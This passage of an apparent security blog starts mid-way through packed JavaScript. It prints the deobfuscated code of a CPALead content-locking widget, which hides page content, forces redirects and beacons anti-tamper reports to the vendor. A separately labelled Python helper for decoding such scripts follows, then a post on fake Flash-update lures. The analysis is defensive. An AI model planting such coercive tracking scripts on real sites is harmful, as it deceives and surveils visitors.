69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/281/264.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}6 144=1;132=8;260}}4(144==0){2.5(\'129\').53=\'\';2.5(\'116\').53=\'\'}26.3.23=(51[1]+\'130\');48("219(\'"+7+"\');",169);2.5(\'24\').3.21=\'55\';131=75;48("156();",255)}9 171(){119=119-1;2.5("256").53=119;4(119<=0){257()}12{48("171()",172)}}2.16(\'<3 258="36/266">#11{27-32: #155; 120:118(18=80); 18: 0.80; -267-18: 0.80;}\');2.16(\'#35 14 {27:42;52-210:138;32:#206;36-208:42}\');2.16(\'#35 91 {93: 162;}\');2.16(\'#35 14:276 {27:42;52-210:138;32:#206;36-208:275}</3>\');2.16(\'<10 13="35" 3="21:42; 36-39: 38; 277-23: 138; ">\');2.16(\'<10 13="129" 39="38" 3="28: 121; 17: 
100%; 31-29: 115;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 13="116" 39="38" 3="28: 121; 17: 100%; 31-29: 125;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 3="278: 152 279 162; 27: 25; 23: 274; 31-29: 273;">\');2.16(\'<64 17="100%" 23="269" 13="24" 44="" 268="75" 270="0" 3="28: 54; 23: 272; 205-65: 86; 205-271: 86; 27-32: 25; 31-29: 254; " 259="265"></64>\');2.16(\'</10></10>\');',10,304,'||document|style|if|getElementById|var|gateid|i|function|div|aijvqsnovujrsfoj3|else|id|a|dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5|write|width|opacity|window|body|display|em|height|wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831|transparent|zcpkmswwmxlgjzbue41a138882143252732d893|background|position|index||z|color|visibility|top|wzjyzgbhqzohhlhvef8426b5a89be2|text|http|center|align||onoroff|none|cpalead|src||com|visible|setTimeout|object_tags||arrayPageSize|font|innerHTML|relative|block||guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9|b|bodyloadtime|offsetHeight|d|widget|right|iframe|x|donation_widget|dpjfszjhzduviwkn424c2477e2d48|c|12px|size|www|php|setAttribute|documentElement|true|getWidgetSetting|mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a|iframe_tags|ytndhhmwdjexjqej106a67d2||getElementsByTagName|pub|42138|x6F|false|hidden|wmode|gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62|clientHeight|for|img|opacity_setting_moz|border|static||getPageSize|length|clientWidth|||alt|cbtonfugwctexmjdff8bd9e3648ab7|images|innerHeight|pointer|closebuttons|onclick|popup_delay|overlay|not|Close|cursor|func|checkForBody|11863866|arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c|Widget|alpha|countdown|filter|absolute|135px|settings|widgetJSON|11863936|172px|452px|onload|lpepmphihufelzdd28c18f8093587772fdd38f|px|ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6|found|oldonload|x61||x6C|self|normal|pn|jrbxaafwxpcz
sjiy0a8801c687f76b5f6d210b99a0250a37|dontscroll|opacity_setting_ie|_0x96be|has_closebtn|tamper|new|hasfirebug|reason|mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e|mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22|ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69|72px|return|_0xb500|000|hienslexztaecvon972b4c6959457b72d8591114abeb305d|is_donation|invalid|video_bucket|rice|appendChild|0px|styles|sgfplcetedjsqmbvbbcb115|x65|escape|x63|x72|500|video_controller|secondpass|1000|Image|tampertype|xwwjxyvbmsrjfpud17e9cae225420|innerWidth|yecqogvnndwlktmu|adixdgozwczhuvaf6e84b|png|pageWidth|pageHeight|gif|scrollHeight|scrollMaxY|firebug|225px|x74|console|settingname||secondclose|blank7|158px|lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73|navigator|nx|zIndex|appName|myGatewayStart|NzMxNTM|insertBefore|left||x69|overflow|fff|item|decoration|ems|weight|embeds|Microsoft|location|createOverlay|Explorer|x6E|url|replace|loadGatewayIframe|Internet|closebtn|ODA1OTE|scrollMaxX|OTM5ODQ|NzM5NTQ|startGateway|this|disable|offsetWidth|to|unescape|scrollWidth|removeChild|catch|e|embed|null|object|has|been|try|Your|logged|parentNode|countdownStarted|attempt|typeof|isloaded|gmgqvtjawhodlboj8b0d5f2c|bodyexisted|addWidgetLoadEvent|nextSibling|createElement|11863886|5000|closelink|riunpfcaxfcggjhpf|type|scrollbars|break|button|close|Array|close_btn|NO|css|moz|allowtransparency|640|frameborder|y|640px|11863881|482px|underline|hover|line|margin|auto|skin|help|nostyle|test|x64|11863846|contentWindow|x66|blank|about|adblock|href|surveysforcharity|org|thankyou|mygateway_iframe_loader|x68|3D|referrer|ref||11863836|subid|firstChild'.split('|'),0,{}))
Which gives us more obfuscated JavaScript:
var widgetJSON={"settings":[{"id":"OTM5ODQ=","opacity":"99","donation_widget":"0"},{"id":"NzMxNTM=","opacity":"50","donation_widget":"0"},{"id":"NzM5NTQ=","opacity":"30","donation_widget":"0"},{"id":"ODA1OTE=","opacity":"95","donation_widget":"0"}]};function getWidgetSetting(gateid,settingname){for(var x=0;x<widgetJSON.settings.length;x++){if(widgetJSON.settings[x].id==unescape(gateid)){return widgetJSON.settings[x][settingname]}}}var popup_delay='';var countdownStarted=false;var isloaded=true;var ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=false;var cbtonfugwctexmjdff8bd9e3648ab7=false;var bodyexisted=false;var bodyloadtime=0;var mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=0;var xwwjxyvbmsrjfpud17e9cae225420='ytndhhmwdjexjqej106a67d2';var gmgqvtjawhodlboj8b0d5f2c='Your attempt to disable this widget has been logged.';function addWidgetLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func}else{window.onload=function(){if(oldonload){try{oldonload()}catch(e){}}if(func){func()}}}}function checkForBody(gateid){var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);if(gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62==null){bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}else{myGatewayStart(gateid)}}function startGateway(gateid){if(popup_delay>0){bodyloadtime=bodyloadtime+popup_delay+'000';setTimeout("checkForBody('"+gateid+"');",popup_delay+'000')}else{bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}}function yecqogvnndwlktmu(onoroff){iframe_tags=document.getElementsByTagName('iframe');for(i=0;i!=iframe_tags.length;i++){if(iframe_tags[i].id!='wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831'){if(onoroff==0){iframe_tags[i].style.visibility='hidden'}if(onoroff==1){iframe_tags[i].style.visibility='visible'}}}}function jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(onoroff){var 
embeds=document.getElementsByTagName('embed');for(var ems=document.embeds,i=0,em;em=ems[i];i++){if(em.id!='video_controller'&&em.id!='video_bucket'){if(onoroff==0){if(navigator.appName=='Microsoft Internet Explorer'){em.setAttribute('wmode','transparent');em.style.visibility='hidden'}else{em.setAttribute('wmode','transparent');var nx=em.nextSibling,pn=em.parentNode;pn.removeChild(em);pn.insertBefore(em,nx)}}if(onoroff==1){em.setAttribute('wmode','window');if(navigator.appName=='Microsoft Internet Explorer'){em.style.visibility='visible'}}}}}function mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(onoroff){object_tags=document.getElementsByTagName('object');for(i=0;i!=object_tags.length;i++){if(object_tags[i].id!='video_controller'&&object_tags[i].id!='video_bucket'){if(onoroff==0){object_tags[i].setAttribute('wmode','transparent');object_tags[i].style.visibility='hidden'}if(onoroff==1){object_tags[i].style.visibility='visible';object_tags[i].setAttribute('wmode','window')}}}}function getPageSize(){var c,d;if(window.innerHeight&&window.scrollMaxY){c=window.innerWidth+window.scrollMaxX;d=window.innerHeight+window.scrollMaxY}else if(document.body.scrollHeight>document.body.offsetHeight){c=document.body.scrollWidth;d=document.body.scrollHeight}else{c=document.body.offsetWidth;d=document.body.offsetHeight}var a,b;if(self.innerHeight){a=document.documentElement.clientWidth?document.documentElement.clientWidth:self.innerWidth;b=self.innerHeight}else if(document.documentElement&&document.documentElement.clientHeight){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else if(document.body){a=document.body.clientWidth;b=document.body.clientHeight}pageHeight=d<b?b:d;pageWidth=c<a?c:a;return arrayPageSize=new Array(pageWidth,pageHeight,a,b)}function dontscroll(){var 
arrayPageSize=getPageSize();if((arrayPageSize[1]-document.getElementById('aijvqsnovujrsfoj3').style.height.replace("px",""))>30){document.getElementById('aijvqsnovujrsfoj3').style.height=(arrayPageSize[1]+'px')}if(mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e==0){setTimeout("dontscroll();",500)}}function mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(gateid,adixdgozwczhuvaf6e84b){if(adixdgozwczhuvaf6e84b!=xwwjxyvbmsrjfpud17e9cae225420){top.location.href='http://www.cpalead.com/adblock.php?pub=42138'}var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.getElementById('aijvqsnovujrsfoj3');var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(1);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(1);yecqogvnndwlktmu(1);mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=1;cbtonfugwctexmjdff8bd9e3648ab7=true;if(getWidgetSetting(gateid,'donation_widget')==1&&secondclose!=true){dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.filter="alpha(opacity=0)";dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.opacity="0.0";document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='http://www.surveysforcharity.org/thankyou-overlay.php';secondclose=true}else{zcpkmswwmxlgjzbue41a138882143252732d893.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='about:blank';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='none'}return false}function guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9(tampertype){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){if(window.console&&window.console.firebug){var hasfirebug=1}else{var hasfirebug=0}dpjfszjhzduviwkn424c2477e2d48=new 
Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper.php?pub=42138&firebug="+hasfirebug+"&tamper="+tampertype;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);sgfplcetedjsqmbvbbcb115()}}function ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69(reason){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper-test.php?pub=42138&reason="+reason;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73('http://www.cpalead.com/nostyle.php?pub=42138')}}function hienslexztaecvon972b4c6959457b72d8591114abeb305d(){if(!document.getElementById('aijvqsnovujrsfoj3')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-not-found')}else if(!document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-not-found')}else if(!document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-found')}else if(document.getElementById('aijvqsnovujrsfoj3').style.width!="100%"||document.getElementById('aijvqsnovujrsfoj3').style.display!="block"||document.getElementById('aijvqsnovujrsfoj3').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-styles')}else if(document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.width!="100%"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.display!="block"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-styles')}else 
if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display!="block"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-visible')}if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight<=300&&document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight!=0){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('iframe-height-invalid-'+document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight)}else if(document.getElementById('aijvqsnovujrsfoj3').offsetHeight<=100&&document.getElementById('aijvqsnovujrsfoj3').clientHeight<=100){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('overlay-height-invalid-'+document.getElementById('aijvqsnovujrsfoj3').offsetHeight+'-'+document.getElementById('aijvqsnovujrsfoj3').clientHeight)}setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d()",1000)}function sgfplcetedjsqmbvbbcb115(){var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x96be[1]][_0x96be[0]]()}function lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73(url){var _0xb500=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];top[_0xb500[1]][_0xb500[0]]=url}function loadGatewayIframe(gateid){document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').contentWindow.location.replace('http://www.cpalead.com/mygateway_iframe_loader.php?pub=42138&subid=203.45.56.190&gateid='+gateid+'&ref='+escape(document.referrer)+'')}function createOverlay(gateid){var arrayPageSize=getPageSize();var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);var 
dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.createElement("div");dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.setAttribute('id','aijvqsnovujrsfoj3');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.position='absolute';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.top='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.left='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.zIndex='11863836';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.width='100%';gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.insertBefore(dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5,gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.firstChild);opacity_setting_ie=getWidgetSetting(gateid,'opacity');opacity_setting_moz=opacity_setting_ie/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_ie+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.height=(arrayPageSize[1]+'px');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='block';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.visibility='visible'}function myGatewayStart(gateid){var closebuttons=['NzMxNTM%3D'];if(!document.getElementById('aijvqsnovujrsfoj3')){createOverlay(gateid)}else{if(document.getElementById('aijvqsnovujrsfoj3').style.display='none'){document.getElementById('aijvqsnovujrsfoj3').style.display='block';opacity_setting_moz=getWidgetSetting(gateid,'opacity')/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_moz+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz}}var arrayPageSize=getPageSize();dontscroll();jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(0);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(0);var 
zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');zcpkmswwmxlgjzbue41a138882143252732d893.style.display='block';zcpkmswwmxlgjzbue41a138882143252732d893.style.visibility='visible';zcpkmswwmxlgjzbue41a138882143252732d893.style.position='absolute';zcpkmswwmxlgjzbue41a138882143252732d893.style.top='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.left='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.zIndex='11863846';zcpkmswwmxlgjzbue41a138882143252732d893.style.width='100%';var has_closebtn=0;for(var i=0;i<closebuttons.length;i++){if(closebuttons[i]==gateid||closebuttons[i]==escape(gateid)){var is_donation=getWidgetSetting(gateid,'donation_widget');if(is_donation==1){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/rice-widget/rice-skin-close-button.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}else{document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a 
onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/help/close_btn.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}var has_closebtn=1;found=i;break}}if(has_closebtn==0){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML=''}zcpkmswwmxlgjzbue41a138882143252732d893.style.height=(arrayPageSize[1]+'px');setTimeout("loadGatewayIframe('"+gateid+"');",500);document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='block';ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=true;setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d();",5000)}function secondpass(){countdown=countdown-1;document.getElementById("closelink").innerHTML=countdown;if(countdown<=0){riunpfcaxfcggjhpf()}else{setTimeout("secondpass()",1000)}}document.write('<style type="text/css">#aijvqsnovujrsfoj3{background-color: #000; filter:alpha(opacity=80); opacity: 0.80; -moz-opacity: 0.80;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a {background:none;font-weight:normal;color:#fff;text-decoration:none}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 img {border: 0px;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a:hover {background:none;font-weight:normal;color:#fff;text-decoration:underline}</style>');document.write('<div 
id="wzjyzgbhqzohhlhvef8426b5a89be2" style="display:none; text-align: center; line-height: normal; ">');document.write('<div id="lpepmphihufelzdd28c18f8093587772fdd38f" align="center" style="position: absolute; width: 100%; z-index: 11863866;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div id="arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c" align="center" style="position: absolute; width: 100%; z-index: 11863936;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div style="margin: 72px auto 0px; background: transparent; height: 482px; z-index: 11863881;">');document.write('<iframe width="100%" height="640" id="wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831" src="" allowtransparency="true" frameborder="0" style="position: relative; height: 640px; overflow-x: hidden; overflow-y: hidden; background-color: transparent; z-index: 11863886; " scrollbars="NO"></iframe>');document.write('</div></div>');
The next steps would be far too time consuming for me given the glaringly obvious conclusion you can draw by googling for cpalead or http://www.cpalead.com/mygateway_iframe_loader.php. In conclusion there isn't anything new here. The techniques aren't very advanced, but good enough to keep the general public ignorant of what's really going on. I did find the firebug / anti-tamper code used in the last bit of JS interesting, but I'm sure that malware analysts have seen it thousands of times before.
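To make the anti-tamper and redirect routines in the captured script readable, here is an added example (not code from the blog or from CPALead) that decodes the `_0x...` hex-escaped string tables, inlines the `table[index]` lookups they feed, and flags the gateway endpoints the widget calls home to. The `SAMPLE_JS` excerpt is constructed to mirror the captured code; the endpoint list is taken from the URLs visible in the dump above.

```python
import re

# Constructed excerpt (not the captured page itself) reproducing the two
# obfuscation tricks in the widget: hex-escaped string tables that hide
# property names, and a tamper beacon reporting back to the network.
SAMPLE_JS = r'''
function sgfplcetedjsqmbvbbcb115(){var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x96be[1]][_0x96be[0]]()}
function lxyzruidcgfwoqsj(url){var _0xb500=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];top[_0xb500[1]][_0xb500[0]]=url}
beacon.src="http://www.cpalead.com/widget-tamper.php?pub=42138&firebug="+hasfirebug+"&tamper="+tampertype;
'''

# Endpoints the captured widget talks to (taken from the page); any of them
# in a site's script is a strong sign the content-locking gateway is present.
GATEWAY_PATHS = (
    "mygateway_iframe_loader.php",
    "widget-tamper.php",
    "widget-tamper-test.php",
    "adblock.php",
    "nostyle.php",
)

_LITERAL = r'"((?:[^"\\]|\\.)*)"'      # capturing: one JS string body
_LITERAL_NC = r'"(?:[^"\\]|\\.)*"'     # same, non-capturing
_TABLE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[\s*((?:' + _LITERAL_NC + r'\s*,?\s*)+)\]')


def decode_js_escapes(body):
    """Expand \\xHH and \\uHHHH escapes in a JS string body to plain text."""
    body = re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), body)
    return re.sub(r'\\u([0-9A-Fa-f]{4})', lambda m: chr(int(m.group(1), 16)), body)


def find_string_tables(js):
    """Map each _0x... array name to its decoded list of strings."""
    return {name: [decode_js_escapes(s) for s in re.findall(_LITERAL, body)]
            for name, body in _TABLE.findall(js)}


def resolve_table_refs(js, tables):
    """Inline table[index] lookups so that window[_0x96be[1]][_0x96be[0]]()
    reads window["location"]["reload"]() and the intent is visible."""
    for name, strings in tables.items():
        def inline(m, strings=strings):
            idx = int(m.group(1))
            return '"%s"' % strings[idx] if idx < len(strings) else m.group(0)
        js = re.sub(re.escape(name) + r'\[(\d+)\]', inline, js)
    return js


def gateway_indicators(js):
    """Known gateway endpoints referenced by the script, for a detection rule."""
    return [path for path in GATEWAY_PATHS if path in js]


if __name__ == "__main__":
    print(resolve_table_refs(SAMPLE_JS, find_string_tables(SAMPLE_JS)))
```

Run against a saved copy of a suspect page's inline script, the resolved output shows the forced `location.reload()` and `top.location.href` redirect in the clear, and the indicator list gives a starting point for a proxy or IDS rule.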
@dblackshell wrote about a "nifty" feature on his blog a while back. A website he uses has implemented a feature which will alert the end user if their Flash version is not up to date. It delivers the message in a very authoritative-looking way, as you can see in this image (click for full version).
flash-update-alert.png
I tend to disagree with his opinion. It is not "nifty", it is harmful. Although I won't go in depth here, I believe, as many others do, that user education does not work. Casual computer users do not have the required knowledge to determine the validity of this message at the tip of their fingers. The end result is that we train more users to click accept. What do you think this user will do the next time they are presented with this image?
flash-update-malware.jpg
The latter image is malware disguised as a Flash update. Could your parents, grandparents, aunts, cousins or friends tell the difference?


This weblog is licensed under a Creative Commons License.